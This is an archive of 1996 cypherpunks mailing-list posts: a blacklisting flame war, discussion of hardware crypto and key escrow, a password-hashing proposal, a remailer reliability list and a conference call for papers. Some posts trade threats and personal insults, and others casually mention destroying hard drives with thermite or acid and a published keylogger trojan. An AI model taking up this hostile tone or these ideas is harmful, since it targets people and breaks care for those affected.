>X-Sender: tcmay@mail.got.net
>Date: Sun, 17 Nov 1996 10:18:36 -0800
>To: "George A. Stathis" <hyperlex@hol.gr>
>From: "Timothy C. May" <tcmay@got.net>
>Subject: Stathis on "Don't Hire" List
>Content-Length: 1426
>
>At 9:00 AM -0200 11/17/96, George A. Stathis wrote:
>
>>It is not ethical to send such strong negative _injunctions_ to masses
>>of people and also to strangers (the 1900-strong members of the cyberphunks
>>list for instance). Because, you may or may not have strong reasons for
>>believing you are justified in such invalidation, but more than a 1000
>>people are now _told_ by (self-appointed) "experts" such as yourself what
>>and whom to ignore or to believe. (Like sheep led to the slaughter)...
>
>"Not ethical"?
>
>But we will do it anyway. Moreover, some of us maintain lists of "Do Not
>Hire" persons. Few high tech or Silicon Valley software companies will hire
>such folks.
>
>Congratulations, Stathis, as you are now on such a list.
>
>
>
>"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
>that the National Security Agency would try to twist their technology."
>[NYT, 1996-10-02]
>We got computers, we're tapping phone lines, I know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."


Comments?


(1)
Well, first of all, Tim May is doing a disservice to the companies who use
his services. They will end up hiring only morons and controllable relics
of human creativity;  Which is why there a WORLD-SHORTAGE of SUPER-
PROGRAMMERS at the moment, as reported e.g. by Byte-magazine.

(2)
If I were a _clever_ American employer, I'd use Tim's 'black list', in
order to HIRE precisely those people whom he considers 'unemployable'... 

(3)
Now I don't want to boast about who I am, but it's strangely ironical
that I _am_ one such "Super-Programmer" (fluent in PROLOG. Assembly, 'C'
and also... English -a computer-lingo as it happens). In the eighties I
was also a painter (of pictures, not walls), and other things...
As a 'New Age' kind of person, I used to admire America for rewarding and
promoting human _talent_, as opposed to human mediocrity, subservience
(the "Yes-Man" attitude), and Evil in the Soul. (as often happened in
old-whore Europe; especially in Greece)... :-)

Nowadays, however, when 'people' like Tim May, are able to dictate to your
admirable High-Technology firms, *what* kind of people to hire and what not
to hire, I can see... very gloomy prospects for American Research, _if_
this type of monstrocity (as his letter) is prevails for too long... :-)

Originally, lists of "unemployable" people, which I had heard of, crossed
my mind as 'probably justified'. As an EMPLOYER MYSELF, with a small but
strong software-house, here in Athens, with at least one important Market 
Success, I do have some experience, you know, of what kind of people *are*
and what kind of people are *not* 'employable'. I once knew a very good but
very egotistic Assembly Language programmer. When he stopped working with
me he stole large sections of my source-code. As a result, I find it hard
to trust 'employees' ever since...


(4)
I would therefore request a list of 'unemployable' people in order to choose
possible collaborators, in my work. They should be highly proficient in
PROLOG code, as well as ASSEMBLY and 'C', and should also be sociable, witty
and independent-minded.  Clashing with personalities like Tim May's may be
considered an added advantage.

(5)
Just for the record, I spoke on the phone with an important partner, told
him what happened, and was told by him that Tim May's letter is the kind
of scum-fascism no serious European Company would ever give credit to...

However, Tim's letter appears not so much to address me personally, as much
as the hordes of gullible, insecure, employment-hungry young Americans, who
are often _terrorised_ into complete SILENCE, since the _slightest_ amount
of free speech in their own natural (or Net-) surroundings, causes Fascist
PUnk-Thugs like TIm May to threaten them with unemployability.

Although Tim May's letter in itself constitutes terroristic harrasment,
threat to libery (via threat of unemployability), and so on, I consider these
labels to be irrelevant in this case, and legal arguments highly irrelevant.

When Nazi Germany deported Einstein it took much less elaborate procedures
than flawed 'unemployability lists'. Perhaps hiring Mafia men to finish us
off would be a much more efficient tactic in this respect. :-)

With Dismay, but also... Inspiration :-)
Geore A. Stathis



P.S. I also cross-posted this DELIBERATELY, this time to the cypherpunks
     list, in order to give more COURAGE to those poor list-members whose
     standard of living suffers the terror and threat of Unemployment,
     just in case they know who is responsible for their future sufferings.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 18 Nov 1996 00:58:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Taxation Thought Experiment
In-Reply-To: <wk2JXD35w165w@bwalk.dm.com>
Message-ID: <oHNkXD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Oops:

dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:

> "The value of the levered firm is the value of the levered firm plus the
                                                     ^un
> interest tax shield (the amount of debt times the tax rate)."


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Kuethe <ckuethe@gpu.srv.ualberta.ca>
Date: Mon, 18 Nov 1996 00:53:34 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: HP announcing some International Cryptography stuff on Monday
In-Reply-To: <Pine.3.89.9611171813.A12245-0100000@netcom14>
Message-ID: <Pine.A32.3.93.961117233339.14170A-100000@gpu3.srv.ualberta.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Lucky Green wrote:

> One possibility is that all crypto is done in hardware. The recent 
> announcements by many hardware manufacturers that smartcard readers will 
> be included in all their products (MS will put them into their keyboards) 
> might get the necessary infrastructure deployed.
> 
> Of course, no crypto will work without the hardware token. The 
> applications use signed code. Hardware tokens are only valid for a 
> certain time. Making future mandatory upgrades to Fortezza, etc. a cinch.
> 
> --Lucky

Ok... I want everybody to go buy a box of diskettes, and put copies of PGP
on them.  Then we'll save our boxes of PGP for when everything but GAK is
illegal, and the thought police are stealing hard drives.  BTW, I really
like that thermite on the HD thing. A possibly better idea could be
something that eats the platters.... little container of nitric acid.
Anyway.. that's off topic. 

If I'm understanding correctly, In the year 2000 (whatever) when we use
crypt(3) it's just a call to the NSAcryptoGAK chip on the board. and
that's supposed to be good enough for everyone.  What's next? A processor
that detects an unGAK'd software crypto program running and phones the NSA
or whoever?

One more thing... what's this about MD5 being broken... references,
webpages, whatever would be nice.

--
Chris Kuethe <ckuethe@gpu.srv.ualberta.ca> LPGV Electronics and Controls
http://www.ualberta.ca/~ckuethe/
http://www.dcs.ex.ac.uk/~aba/rsa/
RSA in 2 lines of PERL
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Mon, 18 Nov 1996 00:59:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9611180453.AA24910@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


The report estimated no such thing..its an urban myth. Give me a 
citation for the statistic from the report.

On Sun, 17 Nov 1996, blanc wrote:

> From:	Dr.Dimitri Vulis KOTM
[cut]
> dv:   I don't think John Gilmore's sexual practices are *that* bizarre. 
> The Kinsey report estimates that 10% of the population shares his 
> practices.
> 
> bw:   I guess you think you're talking to someone who gives a flip.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 17 Nov 1996 16:11:57 -0800 (PST)
To: "Joshua E. Hill" <jehill@w6bhz.calpoly.edu>
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <199611180000.QAA15865@hyperion.boxes.org>
Message-ID: <Pine.LNX.3.94.961118000726.870A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Joshua E. Hill wrote:

> > This is backwards logic; when security begins to hender in the
> > functionality of the system, the security needs to be gotten rid of.
> hmmm... Now that _completely_ depends on the system.  Now for the system
> I administer, the level of security really isn't _that_ high (on the
> grand scale of things).  It is, however, high enough that I inconvenience
> the users with a pro-active password guesser, and passwords that expire
> occasionally.  I suppose that this is a _minor_ inconvenience, but it
> raises the level of security a very large amount.  On a less mundane
> system (one run by the government, say), security is only _slightly_
> less important than being able to use the system in the first place. :)
> On this type of system almost any inconvenience is worth the cost.
> 
> > > You have previously said that the passwd file should not be available 
> > > for public consumption.  Though this is certainly true, it does not
> > > hurt that even if the passwd file is available, nothing particularly 
> > > useful can be done with it.
> > Hince you use pseudorandom password generators and crack.  If you count on
> > somebody not being able to preform an opperation quickly, they'll usually
> > prove you wrong.
> 
> whoa... didn't you just say:
> > when security begins to hender in the
> > functionality of the system, the security needs to be gotten rid of.
> I think that psedu-random password generators would almost certainly
> "hinder in the functionality of the system"...  :-)
>

Sorry, we place different values on "hinder"... when I say hinder, I mean
get in the way.  Last I checked, a faster machine gets more work done.
Sure, technicly having a password at all hinders usage of the system, but
there is still such thing as necisary evil.  I think trying to develop a
password routine that is deliberatly ineffecient is a Bad Thing though.

> 
> I want to make it so that users can use passwords > 8 characters, and I 

That I can agree with.

> want to use something a bit better than FreeBSD's solution.  Whether or 
> not this is necessarily the One True Way (TM) to security, it will increase
> security.  I'm not saying "Hey everyone.  Here is a spiffy new password
> system that will make your entire system completely secure!"  I'm saying
> "Could everyone please look at this algorithm that I'm thinking of using.
> Could you please comment on it, so that I can make it better."  That's it.
> All questions on whether or not passwords should shadowed, crackable,
> not crackable, or consisting only of the letter "e", aside.  Is this
> algorithm secure, and if not, why not.

Ok, I see your point; I still think its not worth the effort.

> 				Joshua

 --Deviant
Horse racing *is* a stable business ...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Sun, 17 Nov 1996 21:13:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: HP announcing some International Cryptography stuff on Monday
In-Reply-To: <199611180018.QAA10957@netcom6.netcom.com>
Message-ID: <0mXyzk200YUd0WZTA0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

frantz@netcom.com (Bill Frantz) writes:
> At 12:05 PM 11/15/96 -0800, John Gilmore wrote:
> >Are they the next Big Company to knuckle under to the Feds?  Their
> >pcmcia-with-local-country-surveillance-chip-socket initiative never
> >seemed to go anywhere.
> 
> Since I am inherently optimistic, one ray of light may be that the San Jose
> Mercury News was mentioning the ability to export the system, and then when
> the necessary licenses (US and foreign) were obtained, turn on the
> encryption.  I guess from this that the encryption is in hardware.  Now,
> software/hardware interfaces are usually fairly simple, so what we have
> here is a software system with a crypto hook.

So what if the "license" is really the key? Sure, it would be
possible to generate your own kwys, but it's possible to export strong
crypto. Large commercial interests tend not to want to run afoul of
the USG. 

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMo/v6skz/YzIV3P5AQG6RwMAleccaFPQO1R4iJbAV/wXj3dF41L8c/5f
pS8meubkoHfxuoywGwXiEyXKL1exzDNFE83L7E5jEHH8XR+gBZEpbV57zt4Ggyyr
eV2DUXWSPmFhO8Pl+BohDYadjY4oFkvQ
=YZut
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Mon, 18 Nov 1996 01:42:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why I shall never undescribe [NOISE] [DEATHS]
In-Reply-To: <199611162106.NAA18467@toad.com>
Message-ID: <32902F74.16C2@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sean Roach wrote:
> 
> At 08:50 AM 11/15/96 -0500, Alec wrote:
> >>From: Bovine Remailer <haystack@cow.net>
> >>To: cypherpunks@toad.com
> >>
> >>Foulmouthed Timothy May rehashes his lies like a rabid parrot
> >>choking on a stale mantra stuck in its poisonous beak.
> >
> >Where else today can one find such prose?  Nay poetry!
> >
> >And they say poetry is dead!
> 
> I thought they said that chivilry was dead.

No, you're thinking of Elvis.

-rich
 ever so happy to be having such an intellectually
 stimulating conversation in the privacy of his own home




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 18 Nov 1996 06:40:05 -0800 (PST)
To: "George A. Stathis" <hyperlex@hol.gr>
Subject: Re: Does John Gilmore...
In-Reply-To: <199611181045.IAA00935@prometheus.hol.gr>
Message-ID: <329074F1.6E87@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


George A. Stathis wrote:
> At 08:04 ìì 17/11/1996 -0500, Black Unicorn wrote:

[snip]

> "Heaven is a place policed by the English, cheered-up by the the Greeks,
>  and organized by the Germans. Hell is a place organized by the Greeks,
>  policed by the Germans, and cheered-up by the English."

Well, welcome to Hell, George [hee hee].





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 18 Nov 1996 06:52:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199611181450.GAA03113@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord middle ?";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

nym.alias.net is back up.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the nym or weasel (newnym style) nymservers.

The cyber nymserver is quite reliable for outgoing mail (which is
what's measured here), but is exhibiting serious reliability problems
for incoming mail.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. This seems to be fixed now.

The penet remailer is closed.

Last update: Mon 18 Nov 96 6:48:35 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          * **********    14:29  99.94%
balls    remailer@huge.cajones.com        - **********     5:32  99.81%
replay   remailer@replay.com              - **++******     9:22  99.69%
haystack haystack@holy.cow.net            - ***#***--#    24:20  99.57%
cyber    alias@alias.cyberpass.net        - +**+  ++**    37:22  99.46%
weasel   config@weasel.owl.de                  ++-++-   2:11:49  99.16%
middle   middleman@jpunix.com             - -.- * +--   1:53:39  98.71%
lead     mix@zifi.genetics.utah.edu         +++++++++*    35:42  98.50%
squirrel mix@squirrel.owl.de              - ++--+-++    2:19:11  98.29%
reno     middleman@cyberpass.net                 +*--   1:16:19  98.24%
lucifer  lucifer@dhp.com                  - + ++++++++    42:33  98.05%
mix      mixmaster@remail.obscura.com     - -+..+++++-  2:00:45  96.31%
nym      config@nym.alias.net                 #*  *#*#      :42  95.87%
extropia remail@miron.vip.best.com        .---------    9:21:36  92.07%
dustbin  dustman@athensnet.com            -  -++--      3:39:00  69.30%
exon     remailer@remailer.nl.com                   ##  7:06:33  41.67%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 18 Nov 1996 07:09:18 -0800 (PST)
To: Huge Cajones Remailer <nobody@huge.cajones.com>
Subject: Re: The Utility of Privacy
In-Reply-To: <199611180713.XAA26863@mailmasher.com>
Message-ID: <Pine.SUN.3.91.961118063411.10538D-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 17 Nov 1996, Huge Cajones Remailer wrote:

> >> Informally, I don't know anybody who has suffered due to a loss of
> >> privacy.
> >
> >Your circle of associations must be limited.
> 
> Examples [of people who have suffered due to loss of privacy]?

Phil Zimmermann often tells the story of a woman whose marriage
was destroyed by the revelation of a long-past indiscretion. 
After her husband divorced her, she committed suicide.

Any number of celebrities have been stalked, attacked and even
killed by obsessed fans who found them through public records.

Every year, children and business executives are kidnapped for
ransom.  The proximate cause of these kidnappings is a breach in
privacy about the whereabouts and schedules of the victim.  

Hitler's gun registration in Germany allowed the Jews to be
disarmed.  I'm sure you are aware of the ultimate consequences
of that little invasion of privacy.

The US Post Office co-operated in the identification and 
imprisonment of people of Japanese ancestry during the second
world war.

The problem with having a whole lot of private information about
you floating around in public is not what damage it can do to you
now, but rather the problems it potentially could cause in the
future.  Just about everyone on this list has been to university.
Not long ago, a college education was essentially a death warrant 
in Cambodia.  Prior to that, a degree was considered a good thing
there.  People saw no reason to hid the fact that they had been
in school.  Trouble is, things changed.

And the trouble today is that things can change now, too.  Think
about the things that you have publicly done or advocated.  Even
if they are as legal as church on Sunday NOW, how comfortable 
will you be about them if there is extreme right or left takeover
in the future?  Start to get the picture?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 18 Nov 1996 05:29:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Political influence [was: Re: A Disservice to Mr. Bell]
In-Reply-To: <199611180155.UAA25194@osceola.gate.net>
Message-ID: <NsaLXD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Ray <jmr@shopmiami.com> writes:
> I suppose that's why Clinton called himself a "libertarian" when it comes to
> gay rights. (Calling yourself something and actually *being* that something
> are, of course, different things.)

Jim Ray too is a libertarian. Can someone please give me judge Kozinski's
address (e-mail or snail)? Given how Jim Ray boasts of his conversations
with the good judge regarding anonymity, I'd like to share with the good
judge Jim Ray's complaint to postmaster@bwalk. Let him see the lying
shyster's true views on free speech and anonymity.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 18 Nov 1996 05:29:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Off the subjects.
In-Reply-To: <19961117.193051.3502.1.Twilley@juno.com>
Message-ID: <7XaLXD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


twilley@juno.com (David Weintraub) writes:

>      I am anxious to find an E-mail list forum dealing
> with financial matters.  Possibly, there exists a forum to find a forum.
>
>      Here in New Jersey there are rumors running about; that 401K's, and
> other corporation contribution plans are corporate assets: both their
> contribution, and the monies deducted from your
> pay, as well as, any other contributions you may
> have made.
>
>      In the event of reorganization, in any form, including bankruptcy,
> these monies are available for
> redistribution to creditors.  Meaning, not us.

Generally speaking, this is true about company-sponsored pension plans,
deferred compensation, etc. Check out the new moderated newsgroup
misc.invest.financial-planning (sp?).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Mon, 18 Nov 1996 00:50:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199611180742.IAA24657@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


>While I don't believe many people in government are "evil" or have "bad
>intentions," I'm a strong believer that _systemic_ or _institutional_ evil
>is possible. Thus, the wide opposition to mandatory key escrow, just as
>civil libertarians of all stripes would oppose mandatory tatooing of
>national I.D. barcodes on arms, or the mandatory retro-fitting of all homes
>with special curtains containing a police-accessible "transparency mode."

And the vision of 1984 looms ever closer. Pity you guys guessed....your activites have put us 12 years behind schedule to date, and we're not happy about that.

--NSA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Mon, 18 Nov 1996 00:54:42 -0800 (PST)
To: dave@kachina.jetcafe.org>
Subject: Re: Does John Gilmore...
Message-ID: <199611181045.IAA00935@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 08:04 ìì 17/11/1996 -0500, Black Unicorn wrote:
>> Given that the free market rule is "he who has the money makes the
>> rules", please explain how anything less than "subsidized speech" (as
>> you put it) is anything close to free speech?
>> 
>> [For those who's assumptions rule their perception: I am *not* arguing
>> that all speech should be subsidized. I am merely pointing out that
>> the organization that is spending the money to broadcast is
>> controlling the speech, hence it is *not* free speech in terms of
>> freedom or cost.]

>Again, you confuse free speech with free broadcast.

Well, I propose a solution to this problem: I don't mind paying fees in
fact, if the prices are reasonable. For instance THIS text was _paid_ for,
since I pay my Internet provider a certain amount of money every month.

It would be unthinkable, however, that my Internet Provider would mess
around with THIS text, or with ANY opinion of mine (I am sure you agree).

Now, a mailing list has _some_ similarities to the services of an
Internet provider, except (usually) the _cost_.  I am sure Mr. Gilmore
would be more than happy to be _paid_ for the (faulty) services he
provides (to his list-members), since e.g. 1900 members times $1 per
2 months (shall we say) would earn him (shall we say) 950 dollars a
month; Not much perhaps in some countries, but enough in most places
as compensation for the services he provides.

The problem with Mr. Gilmore (apart from being an asshole) is really
that he is rather a thick-minded proponent of censorship of his list's
'eccentric' members, that such subtleties don't even cross his mind.








>Forward complaints to : European Association of Envelope Manufactures
>Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
>Vote Monarchist         Switzerland

"Heaven is a place policed by the English, cheered-up by the the Greeks,
 and organized by the Germans. Hell is a place organized by the Greeks,
 policed by the Germans, and cheered-up by the English."

...And what have the noble Swiss got to with this shit?
They are the bankers for both!

:-)
Regards
George








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Mon, 18 Nov 1996 09:00:52 -0800 (PST)
To: frantz@netcom.com
Subject: RE: ideal secure personal computer system
Message-ID: <19961118170052753.AAA87@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


>Bill Frantz (frantz@netcom.com) said something about RE: ideal secure personal computer system on or about 11/17/96 5:37 PM

>(Note that even if it only runs with a user's privileges, a Trojan horse
>will have no problem stealing e.g. that user's PGP secret key ring.  Not
>everything of value is in system files.  

True enough.

>Question, can a user-level Trojan
>horse insert itself as a keyboard monitor and get the PGP pass phrase as
>well?)

In the September 95 issue of NT Developer Richard Wright describes an NT Key Log Service (started as a challenge after his wife threatened to password protect the familiy accounting software <g>). Source code for such a trojan is provided.

Note that the Login screen is *never* hooked.

There must be a way to walk the chain of system hooks. I'll let you know when I find it as that would be the key to writing a detector.


--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 18 Nov 1996 06:06:27 -0800 (PST)
To: fc97-dist@shipwright.com
Subject: FC97 Final Call for Papers
Message-ID: <v0300782faeb61786f01e@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: R.Hirschfeld@cwi.nl
Precedence: Bulk
Date: Mon, 18 Nov 1996 11:46:13 +0100
From: R.Hirschfeld@cwi.nl
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: FC97 Final Call for Papers

		      Financial Cryptography '97
		  February 24-28 1997, Anguilla, BWI
			FINAL CALL FOR PAPERS


General Information:

Financial Cryptography '97 (FC97) is a new conference on the security
of digital financial transactions.  The first meeting will be held on
the island of Anguilla in the British West Indies on February 24-28,
1997.  FC97 aims to bring together persons involved in both the
financial and data security fields to foster cooperation and exchange
of ideas.

Original papers are solicited on all aspects of financial data
security and digital commerce in general, including

    Anonymous Payments                      Fungibility
    Authentication                          Home Banking
    Communication Security                  Identification
    Conditional Access                      Implementations
    Copyright Protection                    Loss Tolerance
    Credit/Debit Cards                      Loyalty Mechanisms
    Currency Exchange                       Legal Aspects
    Digital Cash                            Micropayments
    Digital Receipts                        Network Payments
    Digital Signatures                      Privacy Issues
    Economic Implications                   Regulatory Issues
    Electronic Funds Transfer               Smart Cards
    Electronic Purses                       Standards
    Electronic Voting                       Tamper Resistance
    Electronic Wallets                      Transferability


Instructions for Authors:

Send a cover letter and 9 copies of an extended abstract to be
received by November 29, 1996 to the Program Chair at the address
given below.

The extended abstract should start with the title and an abstract
followed by a succinct statement appropriate for a non-specialist
reader specifying the subject addressed, its background, the main
achievements, and their significance to financial data security.
Submissions are limited to 15 single-spaced pages of 12pt type.
Notification of acceptance or rejection will be sent to authors no
later than January 17, 1997.

Authors of accepted papers must guarantee that their paper will
be presented at the conference.


Proceedings:

Proceedings of the conference will be published online in the Journal
of Internet Banking and Commerce.  Instructions and deadlines for
submission of final papers will be sent along with notification of
acceptance.


Stipends:

A very limited number of stipends may be available to those unable to
obtain funding to attend the conference.  Students whose papers are
accepted and who will present the paper themselves are encouraged to
apply if such assistance is needed.  Requests for stipends should be
addressed to one of the General Chairs.


Registration:

Conference registration and information on travel, hotels, and
Anguilla itself is available at URL http://www.offshore.com.ai/fc97/.


Workshop:

A workshop, intended for anyone with commercial software development
experience who wants hands-on familiarity with the issues and
technology of financial cryptography, is planned in conjunction with
FC97, to be held during the week preceding the conference.  For
further information, please contact one of the General Chairs.


Send Submissions to:

Rafael Hirschfeld
FC97 Program Chair
CWI
Kruislaan 413
1098 SJ Amsterdam
The Netherlands
email: ray@cwi.nl
phone: +31 20 592 4169
fax: +31 20 592 4199


Program Committee:

Matthew Franklin, AT&T Laboratories--Research, Murray Hill, NJ, USA
Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
Rafael Hirschfeld, CWI, Amsterdam, The Netherlands
Arjen Lenstra, Citibank, New York, NY, USA
Mark Manasse, Digital Equipment Corporation, Palo Alto, CA, USA
